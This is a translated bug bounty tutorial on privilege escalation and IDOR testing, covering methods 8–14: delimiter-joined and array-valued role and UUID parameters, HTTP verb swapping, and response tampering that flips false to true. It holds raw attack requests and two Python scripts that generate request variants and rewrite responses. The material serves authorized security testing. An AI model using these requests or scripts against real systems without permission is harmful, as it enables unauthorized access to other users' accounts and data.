Bug Bounty Hunter Series - Privilege Escalation Test Methods and Tips - II
Disclaimer: The programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author of this article accepts none.
Preface
This is the second installment in the privilege escalation series; the previous one is:
Body
Method 8
Try putting two values into the role parameter joined by a delimiter such as |, a comma, or %20 (an encoded space), and check whether you are granted the privileged role. This works when the component that validates the role reads one element of the split value while the component that assigns it reads another, so compare the response with a baseline request that sends only admin (which should be denied).
POST /privilege-escalation HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
Role=admin,user
Method 9
Try changing the Content-Type to application/json and sending the UUID as an array, e.g. {"UUID":["victim-UUID","me-UUID"]}. If the authorization check compares one element against your session while the data lookup uses the other, the victim's record is returned.
POST /idor HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
{"UUID":["victim-UUID","me-UUID"]}
Method 10
Try changing the Content-Type to application/json and sending the role value as an array, e.g. {"Role":["admin","user"]}.
This may yield privilege escalation for the same reason as methods 8 and 9: the check and the assignment may not read the same element of the array.
POST /privilege-escalation HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
{"Role":["admin","user"]}
Method 11
Try changing the HTTP method of the request that carries the UUID parameter to POST, GET, PUT or DELETE. Authorization rules are often registered per method and may not cover every verb the handler accepts.
GET /idor?uuid=Victim-UUID HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Method 12
Try the same with the request that carries the role parameter: replay it as POST, GET, PUT or DELETE.
GET /privilege-escalation?Role=admin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
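The mutations from methods 8 to 12 can be generated rather than typed by hand. The following is an added example in Python, not code from the original article: it builds every variant for the two endpoints shown above and renders each as a raw HTTP request with a computed Content-Length instead of the article's "Number" placeholder. The host, paths, header values, parameter names and placeholder UUIDs come from the article's samples; the function names, the helper, and the choice to emit both value orders (admin,user and user,admin) are assumptions of this example, since which element a backend reads is not known in advance. The article's GET sample uses a lowercase uuid parameter, so the parameter name is a tester-supplied input here.

```python
import json
from urllib.parse import urlencode

# Values taken from the article's sample requests.
HOST = "www.company.com"
BASE_HEADERS = {
    "User-Agent": "Mozilla/5.0",
    "Referer": "https://previous.com/path",
    "Origin": "https://www.company.com",
}
DELIMITERS = ("|", ",", "%20")            # separators suggested in method 8
VERBS = ("GET", "POST", "PUT", "DELETE")  # verbs suggested in methods 11 and 12
FORM = "application/x-www-form-urlencoded"


def render(method, path, headers, body=None):
    """Render one request as raw HTTP/1.1 text with a real Content-Length."""
    hdrs = {"Host": HOST, **headers}
    if body is not None:
        hdrs["Content-Length"] = str(len(body.encode()))
    head = "\r\n".join([f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()])
    return head + "\r\n\r\n" + (body or "")


def delimiter_variants(path, param, privileged, own):
    """Method 8: both values in one form field, joined by each delimiter, in both orders.
    Values are inserted raw (not URL-encoded) so that '%20' reaches the server as written;
    this assumes alphanumeric values like the article's 'admin' / 'user'."""
    out = []
    for delim in DELIMITERS:
        for first, second in ((privileged, own), (own, privileged)):
            body = f"{param}={first}{delim}{second}"
            out.append(("POST", path, {**BASE_HEADERS, "Content-Type": FORM}, body))
    return out


def json_array_variants(path, param, privileged, own):
    """Methods 9 and 10: switch to application/json and send both values as an array."""
    out = []
    for pair in ((privileged, own), (own, privileged)):
        body = json.dumps({param: list(pair)}, separators=(",", ":"))
        out.append(("POST", path, {**BASE_HEADERS, "Content-Type": "application/json"}, body))
    return out


def verb_variants(path, param, value):
    """Methods 11 and 12: the same single parameter replayed under every verb.
    GET carries it in the query string, the other verbs in a form body."""
    out = []
    for verb in VERBS:
        if verb == "GET":
            out.append((verb, f"{path}?{urlencode({param: value})}", dict(BASE_HEADERS), None))
        else:
            out.append((verb, path, {**BASE_HEADERS, "Content-Type": FORM}, urlencode({param: value})))
    return out


def test_plan():
    """All variants for the article's two endpoints as (label, method, path, headers, body)."""
    targets = [  # (label, path, parameter, privileged value, own value) from the article
        ("role", "/privilege-escalation", "Role", "admin", "user"),
        ("uuid", "/idor", "UUID", "victim-UUID", "me-UUID"),
    ]
    plan = []
    for label, path, param, privileged, own in targets:
        for v in delimiter_variants(path, param, privileged, own):
            plan.append((f"{label}-delim",) + v)
        for v in json_array_variants(path, param, privileged, own):
            plan.append((f"{label}-json",) + v)
        for v in verb_variants(path, param, privileged):
            plan.append((f"{label}-verb",) + v)
    return plan


if __name__ == "__main__":
    for label, *req in test_plan():
        print(f"--- {label}")
        print(render(*req))
```

Send each rendered request from Burp Repeater or Intruder and compare the response with two baselines: the legitimate request carrying only your own value, and the request carrying only the victim's or privileged value, which should be denied. A variant is only interesting when it returns something the denied baseline does not.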
Method 13
Send the victim's UUID, then tamper with the response, for example replacing the original error message with the success message the client expects. This bypasses an authorization decision that is made on the client; it only matters if the server does not re-check on the next request, so always confirm by replaying the follow-up action.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length
{
"msg" : "Right To Do Next Action"
}
Method 14
Try to escalate privileges by editing the response, for example changing false to true in the returned flags, and then check whether the server honours the actions the client now unlocks.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length
{
"admin" : "true"
}
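Methods 13 and 14 are done by hand in Burp; the following added example in Python (not code from the original article) does the same rewrite as a function, so it can be dropped into a proxy script or used to prepare a response for replay. It flips JSON booleans and the string "false" to "true" (the article's "admin" : "true" is a string, not a boolean), swaps any denial message the tester lists for the success message, recomputes Content-Length, and reports which paths changed so the tester knows what to look for on the next request. The sample responses are constructed from the article's examples and the quoted tweet; the denial text "Forbidden" and all function names are assumptions.

```python
import json

# Constructed sample, shaped like the login response described in the quoted tweet.
SAMPLE_LOGIN = ("HTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8\r\n"
                "Content-Length: 33\r\n\r\n" + '[{"param1":false,"param2":false}]')


def split_response(raw):
    """Split a raw HTTP response into (status line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = dict(line.split(": ", 1) for line in header_lines)
    return status, headers, body


def flip(value, msg_map):
    """Recursively rewrite a decoded JSON value the way a tester would in Burp:
    false -> true, the string "false" -> "true", and any message found in
    msg_map -> its replacement (method 13's error-to-success swap)."""
    if value is False:
        return True
    if isinstance(value, str):
        if value.lower() == "false":
            return "true"
        return msg_map.get(value, value)
    if isinstance(value, list):
        return [flip(v, msg_map) for v in value]
    if isinstance(value, dict):
        return {k: flip(v, msg_map) for k, v in value.items()}
    return value


def changed_paths(before, after, path=""):
    """List the JSON paths (e.g. 'admin', '[0].param1') whose value differs."""
    if isinstance(before, dict) and isinstance(after, dict):
        return [p for k in before
                for p in changed_paths(before[k], after.get(k), f"{path}.{k}" if path else k)]
    if isinstance(before, list) and isinstance(after, list):
        return [p for i, (b, a) in enumerate(zip(before, after))
                for p in changed_paths(b, a, f"{path}[{i}]")]
    return [] if before == after else [path]


def tamper(raw, msg_map=None):
    """Return (rewritten raw response, list of changed paths).
    Non-JSON bodies are returned untouched. Content-Length is recomputed so the
    client neither truncates nor hangs on the edited body."""
    status, headers, body = split_response(raw)
    if not headers.get("Content-Type", "").startswith("application/json"):
        return raw, []
    original = json.loads(body)
    rewritten = flip(original, msg_map or {})
    new_body = json.dumps(rewritten, separators=(",", ":"))
    headers["Content-Length"] = str(len(new_body.encode()))
    head = "\r\n".join([status] + [f"{k}: {v}" for k, v in headers.items()])
    return head + "\r\n\r\n" + new_body, changed_paths(original, rewritten)


if __name__ == "__main__":
    rewritten, changed = tamper(SAMPLE_LOGIN)
    print(rewritten)
    print("changed:", changed)
```

The changed-paths list is the checklist for the confirmation step: each flag that was flipped corresponds to a feature the client now exposes, and the finding only exists if the server accepts the request that feature sends.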
Reference
Me and @XHackerx007 earned $7,500 for our submission 3 in 1 on @bugcrowd #ItTakesACrowd #bugbountytip
Login Panel
On burp
inspected the response from the Login request
response was on my testing
like [{"param1":false,"param2":false,]etc..
changed the value false to true pic.twitter.com/gZT62emYie
— GodFather Orwa 🇯🇴 (@GodfatherOrwa) September 15, 2021
Originally published on the WeChat public account 迪哥讲事: Bug Bounty Hunter Series - Privilege Escalation Test Methods and Tips - II